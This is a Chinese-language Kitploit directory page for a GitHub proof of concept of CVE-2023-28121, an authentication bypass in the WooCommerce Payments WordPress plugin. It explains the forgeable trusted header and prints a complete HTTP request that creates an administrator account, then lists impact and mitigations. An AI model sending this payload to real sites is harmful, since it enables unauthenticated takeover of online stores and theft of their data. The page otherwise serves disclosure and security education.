Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-28121-WordPress-Privilege-Escalation — 使用 WooCommerce Payments 插件对 WordPress 严重漏洞的实际利用 | Kitploit
工具/GitHubGitHub/luisdevpentest/cve-2023-28121-wordpress-privilege-escalation
身份验证与授权权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubluisdevpentest/cve-2023-28121-wordpress-privilege-escalation

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-28121-WordPress-Privilege-Escalation

使用 WooCommerce Payments 插件对 WordPress 严重漏洞的实际利用

查看仓库
185个月前尚未审核

🔐 CVE-2023-28121 — WordPress 权限提升

使用 WooCommerce Payments 插件对 WordPress 关键漏洞进行实际利用。


📌 摘要

CVE-2023-28121 允许通过 REST API 在无需身份验证的情况下创建管理员用户。

  • 严重性:严重(CVSS 9.8)
  • 影响:完全控制网站
  • 类型:身份验证绕过 / 权限提升
  • 超过 600.000 个活跃安装 - 2023 年 3 月 https://www.wiz.io/vulnerability-database/cve/cve-2023-28121?utm_source=chatgpt.com

📊 受影响的插件拥有数十万安装量,在电商网站中广泛使用。


🎥 演示

https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44


⚠️ 工作原理

系统接受一个可被篡改的请求头:

X-WCPAY-PLATFORM-CHECKOUT-USER: 1

借助这一点,即可在无有效身份验证的情况下发送请求,创建具有高权限的用户。


🧪 概念验证(PoC)

POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

{
  "username": "hacked",
  "password": "StrongPass123!",
  "email": "[email protected]",
  "roles": ["administrator"]
}

✔️ 结果:创建管理员用户


🔥 影响

  • 创建管理员
  • 访问 /wp-admin 管理面板
  • 可能被完全接管
  • 存在欺诈和数据泄露风险

🛠️ 缓解措施

  • 将插件更新到已修复版本
  • 限制 REST API 的访问
  • 正确验证身份认证

🧱 环境

  • WordPress(本地实验环境)
  • WooCommerce Payments(存在漏洞的版本)

📚 参考资料

  • CVE-2023-28121
  • WordPress REST API 文档
  • https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/

👨‍💻 作者

Luis Eduardo .M.B.S.R

渗透测试人员 / Web 安全

LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/

GitHub: https://github.com/luisdevpentest

⚖️ 免责声明

仅在受控环境中作教育用途。本人不对第三方如何使用此类知识承担任何责任。


下载工具